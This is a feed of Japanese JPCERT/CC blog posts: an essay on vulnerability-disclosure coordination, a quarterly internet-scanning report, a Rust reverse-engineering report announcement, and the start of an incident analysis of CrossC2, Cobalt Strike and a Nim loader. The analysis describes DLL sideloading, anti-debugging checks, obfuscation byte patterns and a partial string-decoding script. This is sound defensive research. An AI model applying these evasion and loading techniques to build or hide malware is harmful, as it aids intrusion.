取引費用が十分に小さいとき、権利の境界や所在が明確で、約束が強制されるのであれば、法的ルールが権利をどのように割り当てるとしても、最終的な資源配分は変わらない（当事者の私的な取引を通じて、最も効率的な結果が達成される） （出典：飯田高『法と社会科学をつなぐ』（有斐閣）136ページ） </td> </tr> </tbody> </table> ※ちなみに、本来、コースの定理は公害などの外部不経済に対して、当事者間で調整・解説するための考え方として使われるものであり、脆弱性の発見者とメーカーとの関係では厳密には外部不経済とは言えませんが、その解決アプローチは援用できると考え、引用しています。 取引費用というのは「取引を行う際に生じる費用の総称であり、取引の相手方を探す費用、交渉の実施や合意書作成の費用、履行の監視や違反に対する制裁の費用、戦略的行動に伴う費用」<a href="#fn5">[5]</a>というもので、これを脆弱性調整の作業に当てはめると、 「取引の相手方を探す費用→メーカーの適切な交渉窓口を探すコスト」 「交渉の実施や合意書作成の費用→発見者の主張とメーカー側の主張の着地点を探す（検証）作業」 「履行の監視や違反に対する制裁の費用→公表までの進捗管理」 「戦略的行動に伴う費用→発見者の目的（カンファレンス発表、自社能力のアピール、公益目的等）とメーカーの戦略（レピュテーションダメージの最小化）との間の調整」 といったところになるかと思います。コースの定理は脆弱性調整のように多くの取引費用が発生する場合では「何らかのルールや制度が必要」であることを示唆する理論ともいえます。調整制度がなく、発見者―メーカー間で交渉を行う場合、あらゆる取引費用をお互いが負担することになるわけですが、両者間にはもともと信頼関係がなく（むしろ、最初から主張や利害が衝突していることがある）、さらに脆弱性やセキュリティ技術への知見や情報にも非対称性（メーカーが必ずしもセキュリティに詳しくない場合もあれば、発見者が当該製品について技術的に詳しくないこともある）があります。あまりにも取引コストが高すぎるため、調整が難航し、取引コストを負担せずに個別の目的（例：脆弱性を知らしめること）を達成（例：合意に至らない一方的情報開示）しようとする動きが出てしまうわけです。 脆弱性情報の取り扱い制度は、あらかじめ取扱いルールを示し、調整役を設けることで、こうした双方の取引コスト負担を減らし、交渉を効率よく進めるための制度だと考えることができます。初めて脆弱性を発見する発見者／修正対応するメーカーにとってだけでなく、何度もこうした制度を使うプレーヤーにとっても、制度を使うほど取引費用を減らし、効率化を進めることができるというメリットもあります。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B31_%E8%84%86%E5%BC%B1%E6%80%A7%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%81%AB%E3%81%8A%E3%81%91%E3%82%8B%E8%AA%BF%E6%95%B4%E5%88%B6%E5%BA%A6%E3%81%AE%E6%84%8F%E5%91%B3.png" class="mt-asset-link"><img class="asset asset-image at-xid-3861096 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B31_%E8%84%86%E5%BC%B1%E6%80%A7%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%81%AB%E3%81%8A%E3%81%91%E3%82%8B%E8%AA%BF%E6%95%B4%E5%88%B6%E5%BA%A6%E3%81%AE%E6%84%8F%E5%91%B3-800wri.png" alt="" width="800" height="350"></a> <figcaption>図1_脆弱性情報開示における調整制度の意味</figcaption> </figure> <h4> </h4> <h4>「脆弱性の存在を示せば」それで対策は進むのか</h4> 「脆弱性の存在を明らかにして注意喚起をする」ということであれば、制度以前、あるいはかつての海外側がそうだったように、各自がそれぞれの判断の基で情報開示をすることが「最短ルート」に思えます。問題は、「では、どうやって修正するのか」という観点です。 コンシューマー製品の脆弱性対応の多くでは、公表と同時に修正プログラムの配布を行い、メーカーからの公表等を通じてユーザーに適応を呼びかけるケースが大半です。 他方で、法人向け製品では、修正プログラムや暫定的な回避策／被害軽減策の提供を先んじてユーザー組織に個別通知し、ある程度リスクを低減したところで公表を行うというケースがよく行われています。 これは、「コンシューマーよりも法人向け製品の方が確実にコミュニケーションできる手段があるから」<a href="#fn6">[6]</a>という実務的な背景もありますが、そうしたユーザーの対象製品が侵害されることで、さらにそのユーザー法人の顧客／ステークホルダーなどに影響が出ることが想定されるため、万が一公表後に悪用する攻撃が発生した場合に備えて、暫定的な対応を先んじて行っておきたいという考え方があるからです。 また、法人向けの製品の場合、修正プログラムを瞬時に適用できるケースは少なく、顧客やステークホルダーに影響がある場合、システム停止や修正前のパッチテスト等、多くの工程／リソース投入／コストが発生することから、本格的／根本的な修正を行うまでの暫定的措置が極めて重要です。 一方で、ここまではあくまで「平時」の想定です。悪用がすでに発生している場合、あるいは悪用される蓋然性が高まっている場合はまた異なったタイムラインでの動きが必要になりますが、これは後編で解説したいと思います。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B32_%E4%BF%AE%E6%AD%A3%E5%AF%BE%E5%BF%9C%E3%81%AB%E5%BF%85%E8%A6%81%E3%81%AA%E6%9C%9F%E9%96%93.png" class="mt-asset-link"><img class="asset asset-image at-xid-3861097 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B32_%E4%BF%AE%E6%AD%A3%E5%AF%BE%E5%BF%9C%E3%81%AB%E5%BF%85%E8%A6%81%E3%81%AA%E6%9C%9F%E9%96%93-800wri.png" alt="" width="800" height="390"></a> <figcaption>図2_修正対応に必要な期間</figcaption> </figure> <h4> </h4> <h4>脆弱性公表による「価値の総量」</h4> 脆弱性調整について、基本的に発見者もメーカーも「開示」するという目的ではベクトルが一致しています。ただ、問題になるのはその（期待する）「タイミング」が異なるという点です。 本来、お互いが望んだ公表タイミングがあり、これがズレた分だけ、片方側の不利益になります（図3のとおり）。前述のとおり、修正作業にはメーカー内でもまたユーザーサイドでも相当の期間を必要とすることが多いため、基本的にメーカーが希望する公表タイミングというものは発見者が望む公表タイミングよりは時間軸的に後ろになりがちです。他方で、発見者側にも事情<a href="#fn7">[7]</a>はあり、例えば、国際カンファレンスでの発表を予定している場合などがあります（※しつこいですが、悪用の蓋然性が高まっている、あるいはすでに悪用が発生している場合は事情が異なります。後編で解説します）。この調整もまた、前述のとおり、取引コストがかかるため、調整制度を用いて、この取引コストを減らし、お互いの妥協点となる公表タイミングを調整するわけです。 こうした調整は、発見者、メーカーの「二者それぞれの利益」だけを調整するというものではないことに注意が必要です。脆弱性が適切に開示されなければ、悪用等を惹起したり、メーカーもさることながら、製品のユーザー側で本来の修正タイミング・リソースが大きく変化することでのコスト負担、経済的損失など、ユーザーや社会インフラ全体が不利益を被ったりする可能性があるわけです。前述のコースの定理が示すのは「価値の総量」をどう分配できるかという観点であり、脆弱性情報の取り扱い制度もまた、社会全体としての脆弱性開示による利益を得るための制度であると考えることができます。 脆弱性情報開示の議論において、よく「公益性」という用語が使われているのを散見しますが、二者間の直接交渉がどうしても「二者間の利益の調整」に陥りがちです。ここまでに述べたとおり、社会全体での「価値の総量」を調整するためには、効率的な調整ができる、脆弱性告示制度に基づいた調整が望ましいと筆者は考えます。 前項に同じく、ここまでの整理はあくまで悪用がまだ確認されておらず、また、悪用の蓋然性も高まっていない状態での「平時」での整理です。悪用がすでに発生している、または差し迫った脅威があるという場合はまた異なった判断軸が必要になるわけですが、こちらも後編で解説したいと思います。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B33_%E5%90%84%E3%83%97%E3%83%AC%E3%83%BC%E3%83%A4%E3%83%BC%E3%81%AE%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%82%BF%E3%82%A4%E3%83%9F%E3%83%B3%E3%82%B0%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%83%E3%83%97_%E4%BF%AE%E6%AD%A32.png" class="mt-asset-link"><img class="asset asset-image at-xid-3876912 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B33_%E5%90%84%E3%83%97%E3%83%AC%E3%83%BC%E3%83%A4%E3%83%BC%E3%81%AE%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%82%BF%E3%82%A4%E3%83%9F%E3%83%B3%E3%82%B0%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%83%E3%83%97_%E4%BF%AE%E6%AD%A32-640wri.png" alt="" width="640" height="638"></a> <figcaption>図3_各プレーヤーの開示タイミングのギャップ</figcaption> </figure> <h4>前編のまとめ：予測可能性を担保する制度</h4> 世界的にも珍しい制度が、強い義務や罰則等のない仕組みとしてこの20年以上運用できたのは、ひとえに官民各プレーヤーの理解と協力があったからです。特に重要なのは、脆弱性というものに対する技術的な理解と製品が提供・利用されているという現場側の事情の双方をエンジニアや研究者が理解し、また、さまざまな公的機関やメディアが仕組みの利点を理解しているからこそ成立している仕組みなのです。 前述のとおり、海外ではメーカーとの合意に至らないまま脆弱性情報を開示してしまうトラブルが多く発生していますが、仮に多少強引な方法であったとしても「公益性の観点から開示が望ましい」として、「目的が手段を正当化する」的な擁護の声も見受けられます。しかし、こうしたアプローチは（発見者も含めて）長期的に不利益を生むことになると考えます。 こうした調整されない開示が行われると、当該案件だけではなく、後続の将来の脆弱性調整に影響を及ぼします。メーカーは脆弱性発見者側に不信感を抱くようになり、そうした背景から後ろ向きな対応に見えてしまうことで、発見者側はメーカー側に不信感を抱く・・・という不信の連鎖が蓄積します。これは逆のパターンもあり、発見者からの指摘にメーカー側が反応しないケースが増えるようになると、発見者は「メーカーに伝えるとうやむやにされてしまう」と不信感を抱くようになり、フルディスクロージャーに傾くようになります。 法律、ルールというものは、その運用結果が一定度予測できるからこそ成り立つものであり、脆弱性関連情報取扱制度でいえば、「発見者は受付窓口に届け出る」「第三者に勝手に漏えいしない」「公表については調整機関が調整に入る」「製品開発者は脆弱性の修正と公表を行う」というルールが事前に示されることで関係者の動きが見える（予測できる）のです。また、その実績が公開（メーカーからの公表、JVN公表や発見者名の明示）されることで「ルールのとおり関係者が動いたんだな」と検証できるわけです。この予測可能性が担保されているからこそ、各プレーヤーは疑心暗鬼に陥ることなく、脆弱性情報という極めてリスキーな情報を安定して扱うことができるのです。「目的が手段を正当化する」的な動きというのは、そのルールは動いた当人／組織内の事情であり、予測可能性を持ちません。 現行の制度がベストなのか、という論点はまた別の議論になりますが、後編では、あまり知られていない脆弱性が悪用される場合の対処オペレーションの実際を紹介しつつ、制度運用現場／インシデント対応現場から見える今後の課題・論点について考察したいと思います。 <h4> </h4> <h4>参考文献等</h4> <a name="fn1"></a>[1]経済産業省「脆弱性関連情報取扱体制」https://www.meti.go.jp/policy/netsecurity/vulinfo.html ソフトウエア製品等の脆弱性関連情報に関する取扱規定 https://www.meti.go.jp/policy/netsecurity/vul_notification.pdf 情報セキュリティ早期警戒パートナーシップガイドライン https://www.ipa.go.jp/security/guide/vuln/partnership_guide.html ソフトウエア製品開発者による脆弱性対策情報の公表マニュアル https://www.ipa.go.jp/security/reports/vuln/kenkyukai-report2023.html#section6 <a name="fn2"></a>[2]制度全体の改善に係る検討や活動の年次報告等については、情報システム等の脆弱性情報の取扱いに関する研究会の各年度報告書をご参考ください https://www.ipa.go.jp/security/reports/vuln/kenkyukai-report2023.html <a name="fn3"></a>[3]https://www.ipa.go.jp/archive/files/000072543.pdf <a name="fn4"></a>[4]サイバー攻撃被害に係る情報の意図しない開示がもたらす情報共有活動への影響について　https://blogs.jpcert.or.jp/ja/2023/12/leaks-and-breaking-trust.html <a name="fn5"></a>[5]飯田高「法と社会科学をつなぐ」（有斐閣）136ページ <a name="fn6"></a>[6]派生する論点として、法人向け製品の脆弱性悪用事案の場合に、ただちに公表・注意喚起を行わず、基本的に非公開・個別通知で対応を行うことへの賛否があります。この点については、「サイバー攻撃被害に係る情報の共有・公表ガイダンス」97ページをご参照ください https://www.cyber.go.jp/pdf/council/cs/kyogikai/guidance2022_honbun.pdf <a name="fn7"></a>[7]メーカーやユーザーの不利益を防止するということも重要ですが、発見者のモチベーションも、脆弱性発見・修正のサイクルを健全に保つためには重要と考えています。
TSUBAMEレポート Overflow（2025年4～6月）

Thu, 11 Sep 2025 02:00:00 -0000

はじめにこのブログ「TSUBAMEレポート Overflow」では、四半期ごと...

<h3>はじめに</h3> このブログ「TSUBAMEレポート Overflow」では、四半期ごとに公表している「<a href="https://www.jpcert.or.jp/tsubame/report/">インターネット定点観測レポート</a>」の公開にあわせて、レポートには記述していない海外に設置しているセンサーの観測動向の比較や、その他の活動などをまとめて取り上げていきます。 今回は、TSUBAME（インターネット定点観測システム）における2025年4～6月の観測結果についてご紹介します。 <h3>イスラエルとイランの軍事衝突に関連するとみられるイランを送信元としたパケットの変動について</h3> 2025年6月13日から25日ごろにかけてイスラエルとイランの間で軍事衝突がありました。同時期にイランから観測されるパケットに変動がありましたので取り上げてみたいと思います。図1は6月1日から30日について、1日ごとにイランとイスラエルそれぞれの送信元地域からのIPアドレス数の推移をグラフにしたものです。 <table style="border-collapse: collapse; width: 110.24%; height: 36px;" border="1"> <tbody> <tr style="height: 18px;"> <td style="width: 50%; height: 18px;"> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig1.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig1.png" width="1179" height="577" alt="" class="asset asset-image at-xid-3752125" style="display: block;"/></a> </td> </tr> <tr style="height: 18px;"> <td style="width: 48.0795%; height: 18px; text-align: center;">図1：イスラエルとイラン、それぞれを送信元としたIPアドレス数の推移</td> </tr> </tbody> </table> イランを送信元とするパケットのIPアドレス数は1日あたり170～200ぐらいで推移していましたが、13日ごろから18日ごろにかけては100～130あたりに減少、19日から27日にかけては20～100ぐらいと一時的に大きく減少したことが見て取れます。それに対して、イスラエルを送信元としたIPアドレス数については大きな変動が見られませんでした。 また、一部のメディアでは、6月18日ごろからイランでは国営放送局や銀行、仮想通貨取引所などに対する攻撃の被害が発生したと報じています。イラン政府はサイバー攻撃被害を軽減するため、インターネット接続を一時的に制限したとも報じており、送信元IPアドレス数の減少はネットワーク遮断の影響を受けたものと考えられます。 <h3>国内外の観測動向の比較</h3> 図2は、国内外のセンサー1台が1日あたりに受信したパケット数の平均を月ごとに比較したものです。国内のセンサーよりも海外のセンサーで多くのパケットを観測しています。国内外どちらのセンサーも4月が最も観測数が多く、月を追うごとに徐々に減少してきています。 <table style="border-collapse: collapse; width: 110.24%; height: 36px;" border="1"> <tbody> <tr style="height: 18px;"> <td style="width: 50%; height: 18px;"> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig2.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig2.png" width="1153" height="573" alt="" class="asset asset-image at-xid-3752127" style="display: block;"/></a> </td> </tr> <tr style="height: 18px;"> <td style="width: 48.0795%; height: 18px; text-align: center;">図2：月ごとの国内外センサー平均パケット数の比較</td> </tr> </tbody> </table> <h3>センサーごとの観測動向の比較</h3> 各センサーには、それぞれグローバルIPアドレスが1つ割り当てられています。国内、北米、欧州、それ以外の地域の各センサーで観測状況に違いがあるかを見るために、表1に届いたパケットTOP10をまとめました。センサーごとに順位に違いはありますが、22/TCP、23/TCP、80/TCP、443/TCP、8080/TCP等はほぼすべてのセンサーで観測していました。これらは広範囲のネットワークにてスキャンが行われていることを示唆していると考えられます。 表1：国内外センサーごとのパケットTOP10の比較 <table> <tbody> <tr><th></th><th>国内センサー1</th><th>国内センサー2</th><th>北米センサー1</th><th>北米センサー2</th><th>欧州センサー1</th><th>欧州センサー2</th><th>その他の地域のセンサー1</th><th>その他の地域のセンサー2</th></tr> <tr><td align="right">1番目</td><td>23/TCP</td><td>23/TCP</td><td>80/TCP</td><td>80/TCP</td><td>23/TCP</td><td>23/TCP</td><td>23/TCP</td><td>23/TCPP</td></tr> <tr><td align="right">2番目</td><td>443/TCP</td><td>8728/TCP</td><td>22/TCP</td><td>ICMP</td><td>443/TCP</td><td>22/TCP</td><td>80/TCP</td><td>80/TCP</td></tr> <tr><td align="right">3番目</td><td>80/TCP</td><td>80/TCP</td><td>8728/TCP</td><td>443/TCP</td><td>80/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td></tr> <tr><td align="right">4番目</td><td>8443/TCP</td><td>22/TCP</td><td>23/TCP</td><td>23/TCP</td><td>22/TCP</td><td>80/TCP</td><td>22/TCP</td><td>443/TCP</td></tr> <tr><td align="right">5番目</td><td>8728/TCP</td><td>ICMP</td><td>443/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>34567/TCP</td><td>443/TCP</td><td>22/TCP</td></tr> <tr><td align="right">6番目</td><td>22/TCP</td><td>443/TCP</td><td>8080/TCP</td><td>22/TCP</td><td>445/TCP</td><td>ICMP</td><td>ICMP</td><td>ICMP</td></tr> <tr><td align="right">7番目</td><td>ICMP</td><td>81/TCP</td><td>ICMP</td><td>8080/TCP</td><td>ICMP</td><td>443/TCP</td><td>8080/TCP</td><td>8080/TCP</td></tr> <tr><td align="right">8番目</td><td>8080/TCP</td><td>8080/TCP</td><td>3389/TCP</td><td>6379/TCP</td><td>8080/TCP</td><td>81/TCP</td><td>81/TCP</td><td>81/TCP</td></tr> <tr><td align="right">9番目</td><td>81/TCP</td><td>5555/TCP</td><td>445/TCP</td><td>3389/TCP</td><td>1433/TCP</td><td>8080/TCP</td><td>5555/TCP</td><td>5555/TCP</td></tr> <tr><td align="right">10番目</td><td>6379/TCP</td><td>3389/TCP</td><td>81/TCP</td><td>81/TCP</td><td>6379/TCP</td><td>445/TCP</td><td>6379/TCP</td><td>6379/TCP</td></tr> </tbody> </table> <h3>おわりに </h3> 複数の地点で観測を行うことで、特定のネットワークだけで変動が起きているのかどうかを判断できるようになります。本四半期は、特別な号外による注意喚起等の情報発信には至っていませんが、スキャナーの存在には注意が必要です。今後もレポート公開にあわせて定期的なブログの発行を予定しています。特異な変化などがあった際は号外も出したいと思います。皆さまからのご意見、ご感想も募集しております。掘り下げて欲しい項目や、紹介して欲しい内容などがございましたら、お問い合わせフォームよりお送りください。最後までお読みいただきありがとうございました。 サイバーメトリクスグループ鹿野恵祐 TSUBAMEレポート Overflow（2025年4～6月）
Rustで作成されたバイナリのリバースエンジニアリング調査レポートの公開

Tue, 02 Sep 2025 02:00:00 -0000

Rustは、CやC++を代替する言語として期待されている言語であり、メモリ安全性...

Rustは、CやC++を代替する言語として期待されている言語であり、メモリ安全性や高速性に優れていることから近年注目されています。 Rustがプログラミング言語として普及していく反面、SysJokerのRust亜種やBlackCatランサムウェアなどRustを用いて開発されたマルウェア（以下、「Rustマルウェア」という。）が近年増加傾向にあります。しかしながら、Rustマルウェアに対するリバースエンジニアリング手法に関する知見は、古典的なC・C++マルウェアのリバースエンジニアリング手法と比較して十分ではありません。そのため、JPCERT/CCでは、Rustで作成されたバイナリ(以下、「Rustバイナリ」という。)に対するリバースエンジニアリングに関して検証した結果をまとめた「Rustで作成されたバイナリのリバースエンジニアリング調査レポート」を本日公開しました。 <a href="https://github.com/JPCERTCC/rust-binary-analysis-research-ja">Rustで作成されたバイナリのリバースエンジニアリング調査レポート</a> 今回はこのレポートについて紹介したいと思います。 <h3>レポートの内容</h3> 本レポートは、Rustバイナリのリバースエンジニアリングに関する調査項目を選定し、調査・検証を行った結果をまとめたものです。レポートの詳細な調査項目については Appendix Aをご覧ください。また、本調査で使用したツールのバージョンは以下のとおりです。加えて、バイナリのコンパイルは Windows MSVC環境を使用して調査・検証を実施しました。 <pre style="background:#25292f;color: #fff;"> <code> cargo: 1.82.0 rustc: 1.82.0 IDA Pro v8.3.230608 </code> </pre> <h3>活用イメージ</h3> 本レポートは、調査項目ごとに独立しているため、全体を通読するのではなく、気になる調査項目のみを参照できます。一部の調査項目にはサンプルプログラムも記載しています。そのため、関心のある項目を確認した上で、サンプルプログラムを実際にコンパイルし、レポートとあわせてRustバイナリを確認することを推奨します。 <h3>おわりに</h3> Rustは急速に普及している言語であり、リバースエンジニアリングが比較的困難とされることから、攻撃者による悪用が増加すると考えられます。本レポートがRustマルウェアのリバースエンジニアリングに少しでも役立てば幸いです。記載内容に不備やご意見がございましたら、ぜひお寄せください。 インシデントレスポンスグループ亀井智矢 <h3>Appendix A: 調査項目</h3> <table> <thead> <caption>表1: 調査項目</caption> <tr> <td style="background-color: #bdbdbd; width: 50px; text-align: center;">No.</td> <td style="background-color: #bdbdbd; width: 350px; text-align: center;">項番</td> <td style="background-color: #bdbdbd; width: 500px; text-align: center;">概要</td> </tr> </thead> <tbody> <tr> <td>1</td> <td>CargoのProfile設定の変更に伴うバイナリの差分</td> <td>公開情報から得られるcargoを用いたバイナリサイズ削減手法が、どの程度サイズ削減可能なのか、残留する情報はどのようなものか調査</td> </tr> <tr> <td>2</td> <td>バイナリサイズ削減</td> <td>公開情報から得られるrustcを用いたバイナリサイズ削減手法が、どの程度サイズ削減可能なのか、残留する情報はどのようなものか調査</td> </tr> <tr> <td>3</td> <td>Rustバイナリの識別</td> <td>Rustからコンパイルされたバイナリか否かを識別する方法の調査</td> </tr> <tr> <td>4</td> <td>Exception Directory</td> <td>Exception Directoryの構造から得られる情報の調査</td> </tr> <tr> <td>5</td> <td>TLS Directory</td> <td>TLS Directoryの構造とTLS Callbackの内容から得られる情報の調査</td> </tr> <tr> <td>6</td> <td>main関数の特定と初期化処理</td> <td>ユーザー定義のmain関数の特定方法</td> </tr> <tr> <td>7</td> <td>文字列</td> <td>文字列の取り扱い方法</td> </tr> <tr> <td>8</td> <td>関数名のマングリング</td> <td>マングリングされた関数名の構造およびデマングリング方法</td> </tr> <tr> <td>9</td> <td>クロージャ</td> <td>クロージャの動作や使用されるメモリレイアウト</td> </tr> <tr> <td>10</td> <td>列挙型</td> <td>Rustにおける列挙型の動作がアセンブリにてどのように実装されるかの調査</td> </tr> <tr> <td>11</td> <td>match文</td> <td>Rustにおけるmatch文の動作がアセンブリにてどのように実装されるかの調査</td> </tr> <tr> <td>12</td> <td>Panic文</td> <td>パニック時の挙動であるunwindとabortのアセンブリの差分</td> </tr> <tr> <td>13</td> <td>イテレータ</td> <td>イテレータやnext関数を使用したコードがアセンブリにてどのように実装されるかの調査</td> </tr> <tr> <td>14</td> <td>トレイト</td> <td>トレイトを実装した関数呼び出しと通常の関数呼び出しとの差異</td> </tr> <tr> <td>15</td> <td>代表的なトレイトの識別</td> <td>#\[derive\]属性で用いられるトレイトのアセンブリ上で識別方法</td> </tr> <tr> <td>16</td> <td>動的ディスパッチ参照</td> <td>アセンブリの特徴および動的／静的ディスパッチを用いた呼び出しの差異</td> </tr> <tr> <td>17</td> <td>コレクション</td> <td>使用されるメモリレイアウト</td> </tr> <tr> <td>18</td> <td>同一ジェネリクスから生成された関数の識別</td> <td>生成元となった関数を特定方法の調査</td> </tr> <tr> <td>19</td> <td>スマートポインター</td> <td>スマートポインターの特徴やメモリレイアウト</td> </tr> <tr> <td>20</td> <td>インラインアセンブリ</td> <td>特徴的なコードパターン</td> </tr> <tr> <td>21</td> <td>link属性</td> <td>ライブラリのリンク方法の差異</td> </tr> <tr> <td>22</td> <td>repr属性</td> <td>指定可能なオプションにおいてメモリレイアウトがどのように変化するかの調査</td> </tr> <tr> <td>23</td> <td>標準・サードパーティライブラリの判別方法</td> <td>静的リンクされた標準ライブラリ・サードパーティライブラリ関数の識別の方法</td> </tr> </tbody> </table>
Cobalt Strike Beaconの機能をクロスプラットフォームへと拡張するツール「CrossC2」を使った攻撃

Thu, 14 Aug 2025 05:00:00 -0000

JPCERT/CCでは、2024年9月から12月にかけて、Linux上で動作する...

JPCERT/CCでは、2024年9月から12月にかけて、Linux上で動作するCobalt Strike Beaconを作成可能な拡張ツールCrossC2を使ったインシデントを確認しました。この攻撃者は、CrossC2以外にもPsExecやPlink、Cobalt Strikeを使用してADへの侵入を試みていました。さらに、Cobalt Strikeのローダーとして独自のマルウェア（以下、「ReadNimeLoader」という。）を使用していることを確認しています。この攻撃キャンペーンは、VirusTotalのSubmit情報から、日本だけでなく複数の国で観測されていた可能性があります。 今回は、この攻撃キャンペーンで確認したマルウェアCrossC2およびCobalt Strike、攻撃者が使用するツールについて解説します。また、最後にJPCERT/CCが公開したCrossC2の分析をサポートするツールについても紹介します。 <h3>CrossC2</h3> CrossC2はC言語で作成されたCobalt StrikeのVersion 4.1以上に対応した非公式のBeaconとそのビルダーです。Linux（x86、x64）、macOS（x86、x64、M1）のアーキテクチャで動作するよう開発されています。CrossC2のビルダーはGitHub<a href="#1">[1]</a>で公開されており、Beaconを作成することができますが、ビルダーのソースコードや、Beaconのソースコードは公開されていません。 CrossC2は実行するとすぐにForkし、メインの処理は子プロセス上で行われます。通信先はコンフィグから取得しますが、環境変数"CCHOST"と"CCPORT"からC2サーバーのホストとポート番号を取得することも可能です。実行後、CrossC2はCobalt StrikeのTeamServerと通信を行い、Cobalt Strikeの各種コマンドを実行することができますが、実行可能なコマンドは本来のCobalt Strikeの機能と比べて多くはありません。Beaconの特徴として次に示す複数の解析妨害機能が実装されています。 <ul> <li>1バイトXORによる文字列のエンコード</li> <li>大量の無意味なコードの挿入</li> </ul> 図1に挿入されている無意味なコードの一部を示します。主要な関数には大量に無意味なコードが挿入されていますが、次のバイト列をNOP命令に置換することで容易に難読化解除が可能です。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> 8B 85 ?? ?? ?? ?? 2D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 00 00 00 00 </pre> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS01-800wri.png" width="800" height="912" alt="" class="asset asset-image at-xid-3824881 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図1：CrossC2の難読化コードの一部 </div> コンフィグデータはファイル末尾に格納されており、CrossC2はreadlink関数にて自身のファイルパスを取得後、自身のコードをfreadし、"HOOK"という文字列が見つかるまで検索することでコンフィグデータのアドレスを取得しています。コンフィグの構造は以下のようになっており、暗号化されたコンフィグデータはAES128-CBC（no-padding）で復号することができます。なお、CrossC2はOpenSSLライブラリの関数を使用して復号しています。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> 0x0："HOOK" 検索タグ 0x4：コンフィグデータのサイズ 0x8：暗号化されたコンフィグデータ </pre> CrossC2は正規のTeamServerの拡張機能を利用してBeaconを作成することができます。作成されたBeaconはデフォルトの設定ではUPXでパックされていますが、UPXでアンパックしようとすると失敗してしまうため、アンパックする場合は、一度ファイル末尾のコンフィグ情報を取り除いた後にUPXにてアンパックを行い、アンパック後のファイル末尾にコンフィグ情報を追加する必要があります。 <h3>Cobalt Strike</h3> 図2にCobalt Strikeが実行されるまでの流れを示します。マルウェアの実行の起点となるのは、攻撃者によって登録されたタスクスケジューラから実行される正規ファイルのjava.exeです。java.exeは、DLLサイドローディングによってReadNimeLoaderであるjli.dllをロードします。ReadNimeLoaderは、Nim言語で作成されたローダーです。ReadNimeLoaderは同一フォルダーにあるデータファイルreadme.txtを読み込み、復号した後、メモリ上で実行します。readme.txtには、オープンソースのShellcode形式ローダーであるOdinLdr<a href="#2">[2]</a>が含まれており、OdinLdrが内部にエンコードされているCobalt Strike Beaconをデコードし、メモリ上で実行します。なお、ReadNimeLoaderなどファイル一式は被害端末の"C:\$recycle.bin\"のパスに保存されていました。また、一部のReadNimeLoaderに以下のPDBパスが設定されていたことを確認しています。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> D:\BuildServer\bna-4\work-git\phoenix-repository\phoenix\Release\Battle.net Launcher.exe.pdb </pre> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS02-800wri.png" width="800" height="337" alt="" class="asset asset-image at-xid-3824886 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図2：Cobalt Strikeが実行されるまでの動作フロー </div> <h4>ReadNimeLoader</h4> ReadNimeLoaderの特徴として次に示す4つの耐解析機能があります。 <ul> <li>PEBのBeingDebuggedの値によるデバッグの有無のチェック</li> <li>CONTEXT_DEBUG_REGISTERの値によるデバッグの有無のチェック</li> <li>経過時間の差分を取得し、その値がある0x512以上であればデバッグの有無のチェック</li> <li>例外を発生させ、例外ハンドラーが取得されるかをチェックすることによるデバッグの有無のチェック</li> </ul> 上記の耐解析機能の関数内部にOdinLdrの復号に必要な鍵の一部が格納されており、その関数を実行しないと正しい鍵が生成されず、OdinLdrを復号できない仕組みになっています。また、それ以外の耐解析機能として無意味なコードが挿入されています。そのコードの一部を図3に示します。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS03-640wri.png" width="640" height="629" alt="" class="asset asset-image at-xid-3824887 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図3：妨害コードの一部 </div> ReadNimeLoaderが使用する文字列はエンコードされており、XORをベースとした2つの特徴的なデコード関数が使用されます。そのコードの一部を図4にそれぞれ示します。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS04-800wri.png" width="800" height="370" alt="" class="asset asset-image at-xid-3824888 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図4：各デコード関数 </div> エンコードされた文字列は、次に示すPythonスクリプトでデコードすることが可能です。なお、古いバージョンのReadNimeLoaderではPythonスクリプトのdecode02の関数に該当するデコード関数は存在しておらず、バージョンアップによって後から追加された関数と考えられます。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> def BYTE1(in_data): return (in_data >> 8) & 0xff def BYTE2(in_data): return (in_data >> 16) & 0xff def BYTE3(in_data): return (in_data >> 24) & 0xff def decode02(enc_bytes, xor_key): result = [] for enc_byte in 